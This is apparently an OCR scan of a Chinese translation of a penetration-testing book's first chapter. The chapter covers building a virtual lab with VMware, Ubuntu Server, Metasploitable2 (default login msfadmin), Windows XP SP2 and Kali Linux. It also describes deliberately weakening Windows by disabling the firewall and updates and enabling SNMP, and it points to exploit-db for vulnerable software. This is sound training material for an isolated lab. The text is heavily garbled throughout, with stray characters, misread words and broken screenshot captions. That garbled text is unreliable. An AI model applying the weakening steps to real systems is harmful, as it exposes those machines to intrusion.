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第 一 章 eh 


作者 : Justin Hutchens 


译 者 : 飞龙 
协议 : CC BY-NC-SA 4.0 
第 一 章 介 绍 了 设置 和 配置 虚拟 安全 环境 的 基本 知识 ， 可 用 于 本 书 中 的 大 多 数 场景 和 


ŽD? 
Euro n iu c cQ c 
练习 中 将 使 用 的 一 些 工 具 的 配置 。 


1.1 使 用 VMware Player (Windows) 配置 安全 环境 


通过 在 Windows 工作 站 上 安装 VMware Player， 你 可 以 在 具有 相对 较 低 可 用 资源 的 
Windows PC 上 运行 虚拟 安全 环境 。 你 可 以 免费 获得 VMware Player， 或 者 以 低 成 
本 获得 功能 更 为 强大 的 VMware Player Plus 。 


准备 

为 了 在 Windows 工作 站 上 安装 VMware Player， 首 先 需 要 下 载 软 件 。 VMware 
Player 免费 版 本 的 下 载 ， 请 访 

问 https: // my.vmware.com/web/vmware/free ° 在 这 个 页 面 中 ， 


VMware Player 链接 ， 然 后 单 击 下 载 。 在 下 一 页 中 ， Windows 32 或 64 位 安 
装 软 件 包 ， 然 后 单 击 下载 。 还 有 可 用 于 Linux 32 位 和 64 位 系统 的 安装 包 


要 im 6 


lemme | Welcome to VMware Player 


Create a New Virtual Machine 
+ Create a new virtual machne, which wil then be 


added to the top of your library. 





Open a Virtual Machine 


Open an existing virtual machine, which wil then be 
added to the top of your ibrary. 


Upgrade to VMware Workstation 


Get advanced features such as snapshots, 
developer tool integration, and more. 


Help 
View VMware Player's help contents. 


o o0 w 


= — ER RE 
z9 non-commercal use only. For commercial use, 
+ Buy now, 








打开 VMware Player 后 ， 可 以 选择 创建 新 虚拟 机 来 开始 使 用 。 这 会 初始 化 一 个 非常 
易于 使 用 的 虚拟 机 安装 向 导 : 
Welcome to the New Virtual Hachine Wizard 


A virtual machine is like a physical computer; it needs an operating 
system. How will you install the guest operating system? 


Instal from: 
© Installer disc: 
ch) DVD Drive (D:) x 


(9 Installer disc image file (50): 


办 Select the installer disc image to continue. 


©) 1 wil install the operating system later. 
The virtual machine will be created with a blank hard disk. 


你 需要 在 安装 向 导 中 执行 的 第 一 个 任务 是 定义 安装 介质 。 你 可 以 选择 直接 从 主机 的 
ERES 进行 安装 ， 也 可 以 使 用 ISO 映像 文件 。 本 节 中 讨论 的 大 多 数 安装 都 使 
用 ISO， 并 且 每 个 秘籍 中 都 会 提 到 你 可 以 获取 它们 的 地 方 。 现 在 ， 我 们 假设 我 们 浏 
览 现 有 的 ISO 文件 并 点 击 Next ， 如 下 面 的 截图 所 示 : 





A 


Name the Virtual Machine 
What name would you like to use for this virtual machine? 


\wmwere-host\Shared Folders Documents Virtual Machines Den | Browse... 


(«me )( met» )( cmm | 


后 需要 为 虚拟 机 分 配 名 称 。 庶 拟 机 名 称 只 是 一 个 任意 值 ， 用 作 标 识 ， 以 便 与 库 中 
ud ys 由 于 安全 环境 通常 分 为 多 种 不 同 的 操作 系统 进行 ， 因 
此 将 操作 系统 指定 为 度 拟 机 名 称 的 一 部 分 可 能 很 有 用 。 以 下 屏幕 项 图 显 


示 Specify Disk Capacity 4: 





Specify Disk Capacity 
How large do you want this disk to be? 


The virtual machine's hard disk is stored as one or more files on the host 
— — — a 
, fles, and data to your virtual machine. 


Maximum disk size (GB): 10.0 |$ 
Recommended size for Debian 7: 20 GB 


Store virtual disk as a single file 


© Spit virtual disk into multiple files 


Splitting the disk makes it easier to move the virtual machine to another 
computer but may reduce performance with very large disks. 





neo [<Back [ Mext» | Came | 
下 一 个 屏幕 请 求 安装 的 最 大 尺寸 值 。 虚 拟 机 会 按 需 使 用 硬盘 驱动 器 空 ae ， 但 不 会 超 
过 此 处 指定 的 值 。 此 外 ， 你 还 可 以 定义 虚拟 机 是 包含 在 单个 文件 中 还 是 分 布 在 多 个 
文件 中 。 完成 指定 磁盘 容量 后 ， 你 将 看 到 以 下 屏幕 截图 : 


O 


Ready to Create Virtual Machine 
Click Finish to a'eate the virtual machine and start installing Debian 7. 


The virtual machine will be created with the following settings: 





|. Power on this virtual machine after creation 








(«sek | roh )( cmm | 


最 后 一 步 提供 了 配置 的 摘要 。 你 可 以 选择 Finish 按钮 来 完成 虚拟 机 的 创建 ， 也 
可 以 选择 Customize Hardware.. 按钮 来 操作 更 高 级 的 配置 。 看 一 看 高 级 配置 的 
以 下 屏幕 截图 : 


Memory 
Specify the amount of memory allocated to this virtual 
machine. The memory size must be a multiple of 4 MB. 
[J Processors 1 


(New CD/DVD (... Using file \\wmware-host\Shared F... Memory for this virtual machine: $12 MB 


64 GB 
32 GB 
16 GB 
8GB 
4GB 


256 MB 
128 MB 
64 MB 
32 MB 
16 MB 
8 MB 
4MB 








高 级 配置 可 以 完全 控制 共享 资源 ， 虚 拟 硬 件 配 置 和 网 络 。 大 多 数 默认 配置 对 于 你 的 
安全 配置 应 该 足够 了 ， 但 如 果 需 要 在 以 后 进行 更 改 ， 则 可 以 通过 访问 虚拟 机 设置 来 
解决 这 些 配置 。 完 成 高 级 配置 设置 后 ， 你 将 看 到 以 下 屏幕 截图 : 

Player ~ | J> ~ m a 

ron 


DemovM 





DemoVM 


State: Powered Off 


OS: Debian 7 
Version: Workstation 10.0 virtual machine 
RAM: 512 MB 
" Play virtual machine 
E | Edit virtual machine settings 





安装 向 寻 完 成 后 ， 你 应 该 会 看 到 虚拟 机 库 中 列 出 了 新 的 虚拟 机 。 它 现 在 可 以 从 这 里 
通过 按 下 播放 按钮 启动 。 通过 打开 VMware Player 的 多 个 实例 和 每 个 实例 中 的 唯 
一 VM， 可 以 同时 运行 多 个 虚拟 机 。 


工作 原理 
VMware 创建 了 一 个 虚拟 化 环境 ， 可 以 共享 来 自 单个 主机 系统 的 资源 来 创建 整个 网 


É 
络 环境 。 虚拟 化 软件 (4e VMware) EDA > 3 ARRI ERA EGE WE 
易 和 便宜 。 


1.2 使 用 VMware Player (Mac OS X) 配置 安全 环境 


你 还 可 以 通过 在 Mac 上 安装 VMware Fusion > Æ Mac OS X 上 和 运行 虚拟 安全 环 
境 。VMware Fusion 需要 一 个 必须 购买 的 许可 证 ， 但 它 的 价格 非常 合理 。 


准备 


要 在 Mac 上 安装 VMware Player， 您 首先 需要 下 载 软件 。 要 下 载 免费 试用 版 或 购 
买 软件 ， 请 访问 以 下 URL : https : //ww.vmware.com/products/ fusion / ° 


操作 步骤 


下 载 软件 包 后 ， 你 应 该 在 默认 下 载 目 录 中 找到 它 。 运行 .dmg 安装 文件 ， 然 后 按 
照 屏幕 上 的 说 明 进行 安装 。 安装 完成 后 ， 你 可 以 从 Dock 或 Dock 中 的 
Applications 目录 启动 VMware Fusion ° 加 载 后 ， 你 将 看 到 虚拟 机 库 。 此 库 不 包 
含 任何 虚拟 机 ， 但 你 在 屏幕 左 侧 创建 它们 时 会 填充 它们 。 以 下 屏幕 截图 显示 了 虚拟 
机 库 : 


eoe Virtual Machine Library 


Go) CBE (e) (3) (8). (8) 













iw 





为 了 开始 ， 请 点 击 屏幕 左上 和 角 的 Add 按钮 ， 然 后 点 击 New 9 这 会 启动 虚拟 机 安 
装 向 导 。 安装 向 导 是 一 个 非常 简单 的 指导 过 程 ， 用 于 设置 虚拟 机 ， 如 以 下 屏幕 截图 
所 示 : 


0.60.0 ... Create a Virtual Machine m 


Select the Installation Method 





Install from disc or image Import an existing PC 





More options... o 





第 一 步 请 求 你 选择 安装 方法 。VMware Fusion 提供 了 从 磁盘 或 映像 (ISO 文件 ) 
安装 的 选项 ， 也 提供 了 多 种 技术 将 现 有 系统 迁移 到 新 虚拟 机 。 对 于 本 节 中 讨论 的 所 
21550 需要 选择 第 一 个 选项 。 


选择 第 一 个 选项 Install from disc or image 值 后 ， 你 会 收 到 提示 ， 选 择 要 使 
用 的 安装 光 僵 或 映像 。 如 果 没 有 自动 填充 ， 或 者 自动 填充 的 选项 不 是 你 要 安装 的 映 
像 ， 请 单 击 Use another disc or disc image 按钮 。 这 应 该 会 打开 

Finder ， 它 让 你 能 够 浏览 到 您 要 使 用 的 镜像 。 你 可 以 获取 特定 系统 映像 文件 的 
位 置 ， 将 在 本 节 后 面 的 秘籍 中 讨论 。 最 后 ， 我 们 被 定向 到 Finish 窗口 : 


QAN New Virtual Machine 





Finish 


Virtual Machine Summary 
Guest Operating System Debian 7 
New Hard Disk Capacity 20 C8 
Memory 512 MB 
Networking Share with my Mac (NAT) 
Device Summary CD/DVD, USB Controller, Printer, Sound Card 


To change the default virtual machine settings, click Customize Settings. 
To run the virtual machine now, click Finish 


Customize Settings 








选择 要 使 用 的 镜像 文件 后 ， 单 击 uU 按钮 ， 你 会 进入 摘要 屏幕 。 这 会 向 你 
提供 所 选 配置 的 概述 。 如 果 你 希望 更 改 这 些 设置 ， 请 音 


dt Customize Settings 按钮 。 否则 Finish 按钮 创建 虚拟 机 。 SRR 
击 它 时 ， 你 会 被 要 求 保存 与 座 拟 机 关联 的 文件 。 用 于 保存 它 的 名 称 是 虚拟 机 的 名 
称 ， 并 将 显示 在 虚拟 机 库 中 ， 如 以 下 屏幕 截图 所 示 : 


eoo Virtual Machine Library 
[t] [LeBel (>) (a) (BM) [& 








Add View Path Start Up Settings Snapshots Delete 
VIRTUAL MACHINES : 
S GPS Windows 7 x64 Gy Metasploitable > 
© Kali Ubuntu 


D Metasploitable 


* Windows XP Professional 








Notes 


当 你 添加 更 多 虚拟 机 时 ， 你 会 看 到 它们 包含 在 屏幕 左 侧 的 虚拟 机 库 中 。 通过 选择 任 
何 特定 的 应 拟 机 ， 你 可 以 通过 单 击 顶 部 的 Start Up 按钮 启动 它 。 此 外 ， 你 可 以 

使 用 eae 按钮 修改 配置 ， 或 使 用 Snapshots 按钮 在 各 种 时 间 保 存 虚 拟 机 。 
你 可 以 通过 从 库 中 独立 启动 每 个 虚拟 机 来 同时 运行 多 个 虚拟 机 。 


工作 原理 


通过 在 Mac OS X 操作 系统 中 使 用 VMware Fusion， 你 可 以 创建 虚拟 化 实验 环境 ， 
以 在 Apple 主机 上 创建 整个 网 络 环境 。 庶 拟 化 软件 (如 VMware) 使 个 人 ， 独 立 研 
究 者 构建 安全 环境 变 得 更 加 容易 和 便宜 。 


1.3 安装 Ubuntu Server 


Ubuntu Server 是 一 个 易于 使 用 的 Linux 发 行 版 ， 可 用 于 托管 网 络 服务 和 漏洞 软 
件 ， 以 便 在 安全 环境 中 进行 测试 。 如 果 你 愿意 ， 可 以 随意 使 用 其 他 Linux 发 行 版 
然而 ，Ubuntu 是 初学 者 的 良好 选择 ， 因 为 有 大 量 的 公开 参考 资料 和 资源 。 


准备 
在 VMware 中 安装 Ubuntu Server 之 前 ， 你 需要 下 载 磁盘 镜像 ISO 文件 ) 。 这 


个 文件 可 以 从 的 网 站 下 载 ， 网 址 如 
T: http://www.ubuntu.com/server ° 


操作 步骤 


在 加 载 映像 文件 并 从 虚拟 机 启动 后 ， 你 会 看 到 默认 的 Ubuntu 菜单 ， 如 下 面 的 截图 
所 示 。 这 和 包括 多 个 安装 和 诊断 选项 。 可 以 使 用 键盘 导航 菜单 。 对 于 标准 安装 ， 请 
确保 选中 Install Ubuntu Server 选项 ， 然 后 按 Enter 键 。 


ubuntu? 


Install Ubuntu Server 





安装 过 程 开 始 时 ， 系 统 将 询问 你 一 系列 问题 ， 来 定义 系统 的 配置 。 前 两 个 选项 要 求 
你 指定 您 的 语言 和 居住 国 。 回 答 这些 问题 后 ， 你 需要 定义 你 的 键 瘟 布 局 配置 ， 如 以 
下 屏幕 截图 所 示 : 





[1] Configure the keyboard 


You can try to have your keuboard layout detected by pressing a series of keus. If uou do 
not want to do this, uou will be able to select your keuboard layout from a list. 


Detect keyboard layout? 


<Go Back> mm 





有 多 个 选项 可 用 于 定义 键盘 布局 。 一 个 选项 是 检测 ， 其 中 系统 会 提示 你 按 一 系列 

键 ， 这 会 让 Ubuntu 检测 你 正在 使 用 的 键盘 布局 。 你 可 以 通过 单 击 Yes 使 用 键盘 
Silo 或 者 ， 你 可 以 通过 单 击 NO 手动 选择 键盘 布局 。 此 过 程 将 根据 你 的 国家 /地 
区 和 语言 ， 默 认为 你 做 出 最 可 能 的 选择 。 定义 键盘 布局 后 ， 系 统 会 请 求 你 输入 系统 
的 主机 名 。 如 果 你 要 将 系统 加 入 域 ， 请 确保 主机 名 是 唯一 的 。 接 下 来 ， 系 统 会 要 
求 你 输入 新 用 户 和 用 户 名 的 全 名 。 与 用 户 的 全 名 不 同 ， 用 户 名 应 由 单个 小 写字 母 字 
符 串 组 成 。 数字 也 可 以 包含 在 用 户 名 中 ， 但 它们 不 能 是 第 一 个 字符 。 看 看 下 面 的 

截图 : 








| [ft] Set up users and passwords i 





Select a username for the new account. Your first name is a reasonable choice. The 
username should start with a lower-case letter, which can be followed by any combination 
of numbers and more lower-case letters. 

Username for your account: 


<Cont inue> 








在 你 提供 新 帐户 的 用 户 名 后 ， 你 会 被 要 求 提供 密码 。 确保 你 可 以 记 住 密码 ， 因 为 你 
可 能 需要 访问 此 系统 来 修改 配置 。 看 看 下 面 的 截图 : 


Ut Set up user and password 








A good password will contain a mixture of letters, numbers and punctuation and should be 
changed at regular intervals. 


Choose a password for the new user: 


«Go Back) {Cont inue] 








提供 密码 后 ， 系 统 会 要 求 你 决定 是 否 应 加 密 每 个 用 户 的 主 目录 。 虽然 这 提供 了 额外 
的 安全 层 ， 但 在 实验 环境 中 并 不 重要 ， 因为 系统 不 会 持 有 任何 丨 实 的 敏感 数据 。 dE 
下 来 会 要 求 你 在 系统 上 配置 时 钟 ， 如 以 下 屏幕 截图 所 示 : 


[1] Configure the clock 


Based on your present physical location, your time zone is America/Neuw. York. 


If this is not correct, uou may select from a full list of time zones instead. 
Is this time zone correct? 


«60 Back» ETE aw 





Ts 的 系统 位 于 内 部 |IP 地 址 上 ， 它 也 会 尝试 确定 路 由 的 公共 |IP 地 址 ， 此 信 
息 来 猜测 你 的 时 区 。 如 果 Ubuntu 提供 的 猜测 是 正确 的 ， 选 择 Yes ; 如 果 没 有 ， 请 
选择 No 来 手动 选择 时 区 。 选择 时 区 后 ， 会 要 求 你 定义 磁盘 分 区 配置 ga ATA 
幕 截图 所 示 : 
[11] Partition disks 

The installer can guide you through partitioning a disk (using different standard 

schemes) or, if you prefer, you can do it manually. With guided partitioning you will 

still have a chance later to review and customise the results, 


If you choose guided partitioning for an entire disk, you will next be asked which disk 
should be used. 


Partitioning method: 
- nr 


Guided - use entire disk and set up encrupted LVM 
Manual 


«Go Back» 





如 果 没 有 理由 选择 不 同 的 项 目 ， 建议 你 保留 默认 。 你 不 需要 在 安全 环境 中 执行 任何 
手动 分 区 操作 ， 因 为 每 个 虚拟 机 通常 都 使 用 单个 专用 分 区 。 选择 分 区 方法 后 ， 会 要 
求 你 选择 磁盘 。 除非 你 已 将 其 他 磁盘 添加 到 虚拟 机 ， 否 则 你 只 应 在 此 处 看 到 以 下 选 
项 


(!!] Partition disks 


Note that all data on the disk you select will be erased, but not before you have 
confirmed that you really want to make the changes. 


Select disk to partition: 


<Go Back> 





选择 磁盘 后 E 检查 配置 。 验 证 一 切 是 否 正 确 ， 然 后 确认 安装 。 在 安装 过 
程 之 前 ， 会 要 求 你 百 EHTTPAUS 。 出 于 本 书 的 目的 ， 不 需要 单独 的 代理 ， 你 可 以 
将 此 字段 留 空 。 B. 会 询问 你 是 否 要 在 操作 系统 上 安装 任何 软件 ， 如 以 下 屏幕 截 
E : 


U] Software selection 


At the moment, only the core of the sustem is installed, To tune the system to your 


needs, you can choose to install one or more of the following predefined collections of 
software. 


Choose software to install: 


«Cont inue» 





要 选择 任何 给 定 的 软件 ， 请 使 用 空格 键 。 为 了 增加 攻击 面 ， 我 已 经 选中 了 多 个 服 
务 ， 仅 排除 了 虚拟 主机 和 额外 的 手动 包 选 嫌 。 一 旦 选择 了 所 需 的 软件 包 ， 请 
按 Enter 键 完 成 该 过 程 。 


工作 原理 


Ubuntu Server 没有 GUI， 是 特地 的 命令 行 驱动 。 为 了 有 效 地 使 用 它 ， 建 议 你 使 用 
SSH ° 为 了 配置 和 使 用 SSH， 请 参阅 本 节 后 面 的 "配置 和 使 用 SSH" 秘 籍 。 


1.4 安装 Metasploitable2 


Metasploitable2 是 一 个 故意 存在 漏洞 的 Linux 发 行 版 ， 也 是 一 个 高 效 的 安全 培训 工 
具 。 它 充满 了 大 量 的 漏洞 网 络 服务 ， 还 包括 几 个 漏洞 Web 应 用 程序 。 


准备 


在 你 的 虚拟 安全 实验 室 中 安装 Metasploitable2 之 前 ， 你 首先 需要 从 Web 下 载 它 。 
有 许多 可 用 于 此 的 镜像 和 torrent。 获 取 Metasploitable 的 一 个 相对 简单 的 方法 ， 是 
从 SourceForge 的 URL 下 载 


Dm 


č : http://sourceforge.net/projects/metasploitable/files/Metasploite 


o 


操作 步骤 


Metasploitable2 的 安装 可 能 是 你 在 安全 环境 中 执行 的 最 简单 的 安装 之 一 。 这 是 因为 
当 从 SourceForge 下 载 时 ， 它 已 经 准备 好 了 VMware 虚拟 机 。 下 载 ZIP 文件 后 ， 
在 Windows 或 Mac OS X 中， 你 可 以 通过 在 Explorer 或 Finder 中 双击 ， 分 别 轻松 
提取 此 文件 的 内 容 。 看 看 下 面 的 截图 : 


| 


metasploitable- Metasploitable2 - 
linux-2.0.0.zip Linux 
873.1 MB 5 items 


解压 缩 之 后 ，ZIP 文件 会 返回 一 个 目录 ， 其 中 有 五 个 附加 文件 。 这 些 文件 中 包括 
VMware VMX 文件 。 要 在 VMware 中 使 用 Metasploitable， 只 需 单 击 File 下 拉 
菜单 ， 然 后 单 击 Open 。 然后 ， 浏 览 由 ZIP 提 取 过 程 创建 的 目录 ， 并 打 

jt Metasploitable.vmx ， 如 下 面 的 屏幕 截图 所 示 : 


Metasploitable.nvrarr 
Metasoloitable.vm« 
— 
Metasploitable.vmsd 
B5 Metasploitable.vmx 
Metasploitable.vmx! 


VMX 


e Metasploitable.vmx 

Kind VMware virtual ma 
ze 3KB 

uted 5/21/12, 12:46 AM 

odified 5/21/12, 12:46 AM 

ned 5/21/12, 12:46 AM 


一 旦 打开 了 VMX 文件 ， 它 应 该 包含 在 你 的 虚拟 机 库 中 。 从 库 中 选择 它 并 单 
i: Run 来 启动 VM， 你 可 以 看 到 以 下 界面 : 





VM RE’ AETA a Edd REKAH 。 黑 认 登 录 凭 证 的 用 户 名 和 密码 
是 msfadmin ° 此 机 器 也 可 以 通过 SSH 访 问 ， 在 本 节 后 面 的 “配置 和 使 用 SSH” 中 会 
涉及 。 


工作 原理 


J 为 安全 测试 教学 的 目的 而 建立 。 这 是 一 个 非常 有 效 的 工具 ， 但 必须 
小 心 使 用 。 Metasploitable 系统 不 应 该 暴露 于 任何 不 可 信 的 网 络 中 。 不 应 该 为 其 分 

配 公共 可 访 问 的 IP 地 址 ， 并 且 不 应 使 用 端口 转发 来 使 服务 可 以 通过 网 络 地 址 转换 
(NAT) 接口 访问 。 


1.5 安装 Windows Server 


在 测试 环境 中 安装 Windows 操作 系统 对 于 学 习 安 全 技能 至 关 重 要 ， 因 为 它 是 生产 
系统 中 使 用 的 最 主要 的 操作 系统 环境 。 所 提供 的 场景 使 用 Windows XP 

SP2 (Service Pack 2) 。 由 于 Windows XP 是 较 昌 的 操作 系统 ， 因 此 在 测试 环境 
中 可 以 利用 许多 缺陷 和 漏洞 。 


准备 


要 完成 本 教程 中 讨论 的 任务 和 本 书后 面 的 一 些 练习 ， 你 需要 获取 Windows 操作 系 
统 的 副本 。 如 果 可 能 ， 应 该 使 用 Windows XP SP2， 因 为 它 是 在 编写 本 书 时 使 用 的 
操作 系统 。 选 择 此 操作 系统 的 原因 之 一 是 因为 它 不 再 受 微软 支持 ， 并 且 可 以 相对 容 
易 地 获取 ， 以 及 成 本 很 低 甚 至 无 成 本 。 但 是 ， 由 于 不 再 支持 ， 您 需要 从 第 三 方 供应 
商 处 购买 或 通过 其 他 方式 获取 。 这 个 产品 的 获得 过 程 算 你 来 完成 。 


操作 步骤 


从 Windows XP 映像 文件 启动 后 ， 会 加 载 一 个 蓝 色 菜单 屏幕 ， 它 会 问 你 一 系列 问 
题 ， 来 指导 你 完成 安装 过 程 。 一 开始 ， 它 会 要 求 你 定义 操作 系统 将 安装 到 的 分 区 。 
除非 你 对 虚拟 机 进行 了 自 定 义 更 改 ， 否 则 你 只 能 在 此 处 看 到 一 个 选项 。 然 后 ， 你 可 
以 选择 快速 或 全 磁盘 格式 。 任 一 选项 都 应 可 以 满足 虚拟 机 。 一 旦 你 回答 了 这 些 初步 
问题 ， 你 将 收 到 有 关 操 作 系 统 配 置 的 一 系列 问题 。 然 后 ， 你 会 被 引导 到 以 下 屏幕 : 


Windows 


"s Type pour full name and the name of your company or organization. 


Name Jusbn Hutchens 


Organization: Packt Publishing 





首先 ， 你 会 被 要 求 提供 一 个 名 称 和 组 织 。 该 名 称 分 配给 已 创建 的 初始 帐户 ， 但 组 织 
名 称 仅 作 为 元 数据 而 包含 ， 对 操作 系统 的 性 能 没有 影响 。 接 下 来 ， 会 要 求 你 提供 计 
算 机 名 称 和 管理 员 密 码 ， 如 以 下 屏幕 截图 所 示 : 





如 果 你 要 将 系统 添加 到 域 中 ， 建 议 你 使 用 唯一 的 计算 机 名 称 。 管理 员 密 码 应 该 是 你 
能 够 记 住 的 密码 ， 因 为 你 需要 登录 到 此 系统 以 测试 或 更 改 配置 。 然后 将 要 求 你 设置 
日 期 ， 时 间 和 时 区 。 这 些 可 能 会 自动 填充 ， 但 确保 它们 是 正确 的 ， 因 为 错误 配置 日 
期 和 时 间 可 能 会 影响 系统 性 能 。 看 看 下 面 的 截图 : 


Domain 
pine, am A O a GA eae ese en ee, A 
domain is a collection of computers defined by a network administrator. 





置 时 间 和 日 期 后 ， 系 统 会 要 求 你 将 系统 分 配 到 工作 组 或 域 。 本 书 中 讨论 的 大 多 数 
练 习 可 以 使 用 任 一 配置 执行 。 但是， 有 一 些 远 程 SMB 审计 任务 ， 需 要 将 系统 加 入 
域 ， 这 会 在 后 面 讨论 。 以 下 屏幕 截图 显示 Help Protect your PC 窗口 : 
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# Help protect my PC by turning on Automatic Updates now 
re mmendet 


9 Not right now 
x E E 


zti pdate 
threat 





安装 过 程 完成 后 ， 系 统 将 提示 你 使 用 自动 更 新 保护 您 的 电脑 。 默 认 选择 是 启用 自动 
更 新 。 但 是 ， 由 于 我 们 希望 增加 我 们 可 用 的 测试 机 会 ， 我 们 将 选 
择 Not right now 选项 。 


工作 原理 


Windows XP SP2 对 任何 初学 者 的 安全 环境 ， 都 是 一 个 很 好 的 补充 。 由 于 它 是 一 个 
较 蝇 的 操作 系统 ， 它 提供 了 大 量 的 可 用 于 测试 和 利用 的 漏洞 。 但 是 ， 随 着 渗透 测试 
领域 的 技术 水 平 的 提高 ， 开 始 通过 引入 更 新 和 更 安全 的 操作 系统 (如 Windows 7) 
来 进一步 提高 你 的 技能 是 非常 重要 的 。 


1.6 增加 Windows 的 攻击 面 


为 了 进一步 提高 Windows 操 作 系 统 上 可 用 的 攻击 面 ， 添 加 易 受 攻击 的 软件 以 及 启用 
或 禁用 茶 些 集成 组 件 很 重要 。 


准备 


在 修改 Windows 中 的 配置 来 增加 攻击 面 之 前 ， 你 需要 在 其 中 一 个 虚拟 机 上 安装 操作 
系统 。 如 果 尚 未 执行 此 操作 ， 请 参阅 本 章 中 的 “安装 Windows Server" 秘 籍 。 


操作 步骤 


启用 远程 服务 ， 特 别 是 未 打 补 丁 的 远程 服务 ， 通 常 是 将 一 些 漏洞 引入 系统 的 有 效 方 
法 。 首先， 你 需要 在 Windows 系 统 上 局 用 简单 网 络 管理 协议 (SNMP) 。 为 此 ， 
请 打开 左下 角 的 开始 菜单 ， 然 后 单 击 Control Panel (控制 面板 ) o x 

击 Add or Remove Programs (添加 或 删除 程序 ) 图 标 ， 然 后 单 击 屏幕 左 全 

的 Add/Remove Windows Components (添加 /删除 Windows 组 件 ) 链接 ， 你 会 看 
到 以 下 界面 : 


Oo 


Windows Components Wizard 


Windows Components -—1 
You can add of remove components of Windows XP. e 


Lobe pone ie brar pe-a acere Bera er apasanka s 2 
of the component will be installed 


To see what's included in a component, chick. 


[3 Bf Message Queuing 0.0MB 
网 NP MSN Explorer 207 MB 
M 3 Networking Services 03MB 
[3 S (her Network File and Print Services NMR Y: 


Description Includes tools for monitonng and improving network performance. 


Total disk space required: 54.8 MB 
Space eves ondak 389924 MB 





， 你 可 以 看 到 可 以 在 操作 系统 上 启用 或 禁用 的 组 件 列 表 。 向 下 滚动 
uM and Monitoring Tools (管理 和 监控 工具 ) ， 并 双击 它 来 打开 
其 中 包含 的 选项 ， 如 以 下 屏幕 截图 所 示 : 


Management and Monitoring Tools 


rapt decors component, ckck losers ede erstens s oed qi 
the component vall be installed. To see what's included in a component, click 


Subcomponents of Management and Monitoring Tools: 


Lz eh 0.3 MB | 


j 


Description Allows chert applicabons to access static and dynamic SNMP information 
anagement {WMI} 





打开 后 ， 请 确保 选中 SNMP 和 WMI SNMP Provider 4 X Z&1E ¢ 2243 fb TE ER 
上 执行 远程 SNMP 查 询 。 单 击 确定 后 ， 会 开始 安装 这 些 服务 。 这些 服务 的 安装 需 
要 Windows XP 映像 光盘 ，VMware 可 能 在 虚拟 机 映像 后 删除 。 如 果 是 这 种 情 
况 ， 你 会 收 到 一 个 弹出 请 求 让 你 插入 光盘 ， 如 以 下 屏幕 截图 所 示 : 


Insert Disk 


Please insert the Disc labeled Windows XP 
Professional Service Pack 2 CD' into your CD-ROM 
drive (D: and then click OK. 


You can also click OK if you want files to be copied 
from an alternate location. such as a floppy disk or a 
network server. 





为 此 ， 请 访问 虚拟 机 设置 。 确保 已 启用 虚拟 光驱 ， 然 后 浏览 主机 文件 系统 中 的 ISO 
文件 来 添加 光 瘟 : 





Enable CD/DVD Drive FE | 


This CD/DVD drive is configured to use the following: 
3 Windows XP Pro SP2.iso 


b Advanced options 


一 旦 检测 到 光盘 ，SNMP 服 务 的 安装 会 自动 完成 。 

Windows Components Wizard (Windows 组 件 向 导 ) 应 在 安装 完成 时 通知 你 。 

除了 添加 服务 之 外 ， 还 应 删除 操作 系统 中 包含 的 一 些 默 认 服 务 。 为 此 ， 请 再 次 打 

开 Control Panel (控制 面板 ) ， 然 后 双击 Security Center (安全 中 心 ) 图 
标 。 滚动 到 页 面 底部 ， 单 击 windows Firewall (Windows 防 火 墙 ) 的 链接 ， 并 
确保 此 功能 已 关闭 ， 如 以 下 屏幕 截图 所 示 : 


General Exceptions Advanced 
Windows Firewall helps protect your computer by preventing unauthorized users 
from gaining access to your computer through the Intemet or a network 


| 
| 
| 
f | 
Q © On (recommended) 
This setting blocks all outside sources from connecting to this 
computer, with the exception of those selected on the Exceptions tab 


Don't allow excephons 


Select this when you connect to public networks in less secure 
locations. such as airports. You will not be notified when Windows 
Firewall blocks programs. Selections on the Exceptions tab wil be 
ignored. 


o © Off (not recommended) 


Avoid using this setting. Turing off Windows Firewall may make this 
computer more vulnerable to viruses and intruders. 


x» 
8 


关闭 Windows 防 火 墙 功能 后 ， 单 击 OK 返回 上 一 级 菜单 。 再 次 滚动 到 底部 ， 
单 击 Automatic mmm) (自动 更 新 ) 链接 ， 并 确保 它 也 关闭 。 


工作 原理 


在 操作 系统 上 启用 功能 服务 和 禁用 安全 服务 大 大 增加 了 泄密 的 风险 。 通 过 增加 操作 
条 统 上 存在 的 漏洞 数量 ， 我 们 还 增加 了 可 用 于 学 习 攻 击 模式 和 利用 的 机 会 的 数量 。 
这 个 特定 的 秘籍 只 注重 Windows 中 集成 组 件 的 操作 ， 来 增加 攻击 面 。 ps ， 安 装 
各 种 具有 已 知 漏洞 的 第 三 方 软件 包 也 很 有 用 。 可 以 在 以 下 URL. 中 找到 易 受 攻击 的 
软件 包 : 


e http://www.exploit-db.com/ 
e http://www.oldversion.com/ 


1.7 安装 Kali Linux 


Kali Linux 是 一 个 完整 的 渗透 测试 工具 库 ， 也 可 用 作 许 多 扫描 脚本 的 开发 环境 ， 这 
将 在 本 书 中 讨论 。 


准备 
在 你 的 虚拟 安全 测试 环境 中 安装 Kali Linux 之 前 ， 你 需要 从 受信 任 的 来 源 获 取 ISO 


文件 (映像 文件 ) ° Kali ru ISO 可 以 
从 http://www.kali.org/downloads/ 下 载 。 


操作 步骤 


从 Kali Linux 映像 文件 启动 后 ， 你 会 看 到 初始 启动 菜单 。 在 这 里 ， 向 下 滚动 到 第 四 
个 选项 ， Install ， 然后 按 | Enter 键 开始 安装 过 程 : 


EMPL LULU 


Boot menu 





一 旦 开始 ， 系 统 会 引导 你 通过 一 系列 问题 完成 安装 过 程 。 最 初 ， 系 统 会 要 求 你 提供 
你 的 位 置 (HX) 和 语言 。 然后， 你 会 获 竺 一 个 选项 ， 可 以 手动 选择 键盘 配置 或 使 
用 指导 检测 过 程 。 下 一 步 回 请 求 你 为 系统 提供 主机 名 。 如 果 系 统 需 要 加 入 域 ， 请 
确保 主机 名 是 唯一 的 ， 如 以 下 屏幕 截图 所 示 : 


Please enter the hostname for this system. 


The hostname js a single word thot identifies your system to the network. If you don't 
know what your hostname should be, consult your network administrator, If you are setting 
up your oun home network, you can make something up here. 





接 下 来 ， 你 需要 设置 root 帐户 的 密码 。 建议 设置 一 个 相当 复杂 的 密码 ， 不 会 轻易 
攻破 。 看 看 下 面 的 截图 : 





接 下 来 ， 系 统 会 要 求 你 提供 所 在 时 区 。 系 统 将 使 用 |P 地 理 位 置 作 为 你 的 位 置 的 最 住 
猜测 。 如 果 这 不 正确 ， 请 手动 选择 正确 的 时 区 : 





为 了 设置 磁盘 分 区 ， 使 用 默认 方法 和 分 区 方案 应 足以 用 于 实验 目的 : 





建议 你 使 用 镜像 来 确保 Kali Linux 中 的 软件 保持 最 新 : 





